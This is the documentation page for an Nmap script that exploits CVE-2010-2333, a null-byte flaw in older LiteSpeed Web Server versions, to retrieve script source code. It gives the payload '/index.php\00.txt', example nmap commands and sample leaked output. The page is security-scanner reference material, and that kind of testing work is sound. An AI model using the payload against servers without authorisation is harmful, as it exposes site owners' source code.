File http-litespeed-sourcecode-download
Script types:
portrule
Categories:
vuln, intrusive, exploit
Download: http://nmap.org/svn/scripts/http-litespeed-sourcecode-download.nse
User Summary
Exploits a null-byte poisoning vulnerability in Litespeed Web Servers 4.0.x before 4.0.15 to retrieve the target script's source code by sending a HTTP request with a null byte followed by a .txt file extension (CVE-2010-2333).
If the server is not vulnerable it returns an error 400. If index.php is not found, you may try /phpinfo.php which is also shipped with LiteSpeed Web Server. The attack payload looks like this:
/index.php\00.txt
References:
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2333
- http://www.exploit-db.com/exploits/13850/
Script Arguments
http-litespeed-sourcecode-download.uri
URI path to remote file
smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername
See the documentation for the smbauth library.http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent
See the documentation for the http library.Example Usage
nmap -p80 --script http-litespeed-sourcecode-download --script-args http-litespeed-sourcecode-download.uri=/phpinfo.php <host> nmap -p8088 --script http-litespeed-sourcecode-download <host>
Script Output
PORT STATE SERVICE REASON 8088/tcp open radan-http syn-ack | http-litespeed-sourcecode-download.nse: /phpinfo.php source code: | <HTML> | <BODY> | <?php phpinfo() ?> | </BODY> |_</HTML>
Requires
Author: Paulino Calderon
License: Same as Nmap--See http://nmap.org/book/man-legal.html